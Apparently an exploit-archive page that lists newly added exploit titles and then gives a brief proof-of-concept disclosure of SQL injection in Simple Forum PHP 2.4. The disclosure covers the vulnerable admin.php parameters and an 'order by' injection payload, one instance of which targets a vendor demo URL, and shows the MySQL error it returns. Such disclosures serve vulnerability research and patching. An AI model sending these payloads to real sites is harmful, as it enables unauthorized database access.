113ab3e40e
4 new exploits Open-Xchange App Suite 7.8.2 - Cross Site Scripting Open-Xchange App Suite 7.8.2 - Cross-Site Scripting Open-Xchange Guard 2.4.2 - Multiple Cross Site Scripting Open-Xchange Guard 2.4.2 - Multiple Cross-Site Scripting Vifi Radio v1 - Cross-Site Request Forgery Vifi Radio 1.0 - Cross-Site Request Forgery b374k Web Shell - Cross-Site Request Forgery / Command Injection b374k Web Shell 3.2.3 / 2.8 - Cross-Site Request Forgery / Command Injection PHP Press Release - Stored Cross Site Scripting PHP Press Release - Persistent Cross-Site Scripting ApPHP MicroBlog 1.0.2 - Stored Cross Site Scripting ApPHP MicroBlog 1.0.2 - Persistent Cross-Site Scripting ApPHP MicroCMS 3.9.5 - Stored Cross Site Scripting OpenCimetiere v3.0.0-a5 - Blind SQL Injection ApPHP MicroCMS 3.9.5 - Persistent Cross-Site Scripting OpenCimetiere 3.0.0-a5 - Blind SQL Injection Colorful Blog - Stored Cross Site Scripting Colorful Blog - Persistent Cross-Site Scripting Simple Forum PHP 2.4 - SQL Injection Simple Forum PHP 2.4 - Cross-Site Request Forgery (Edit Options) NO-IP DUC v4.1.1 - Unquoted Service Path Privilege Escalation YouTube Automated CMS 1.0.7 - Cross-Site Request Forgery / Persistent Cross-Site Scripting
30 lines
1.1 KiB
Text
Executable file
30 lines
1.1 KiB
Text
Executable file
=====================================================
|
|
# Simple Forum PHP 2.4 - SQL Injection
|
|
=====================================================
|
|
# Vendor Homepage: http://simpleforumphp.com
|
|
# Date: 14 Oct 2016
|
|
# Demo Link : http://simpleforumphp.com/forum/admin.php
|
|
# Version : 2.4
|
|
# Platform : WebApp - PHP
|
|
# Author: Ashiyane Digital Security Team
|
|
# Contact: hehsan979@gmail.com
|
|
=====================================================
|
|
# PoC:
|
|
Vulnerable Url:
|
|
http://localhost/forum/admin.php?act=replies&topic_id=[payload]
|
|
http://localhost/forum/admin.php?act=editTopic&id=[payload]
|
|
Vulnerable parameter : topic_id , id
|
|
Mehod : GET
|
|
|
|
A simple inject :
|
|
Payload : '+order+by+100--+
|
|
http://simpleblogphp.com/blog/admin.php?act=editPost&id=1'+order+by+999--+
|
|
|
|
In response can see result :
|
|
Could not execute MySQL query: SELECT * FROM demo_forum_topics WHERE
|
|
id='' order by 100-- ' . Error: Unknown column '100' in 'order clause'
|
|
|
|
Result of payload: Error: Unknown column '100' in 'order clause'
|
|
=====================================================
|
|
# Discovered By : Ehsan Hosseini
|
|
=====================================================
|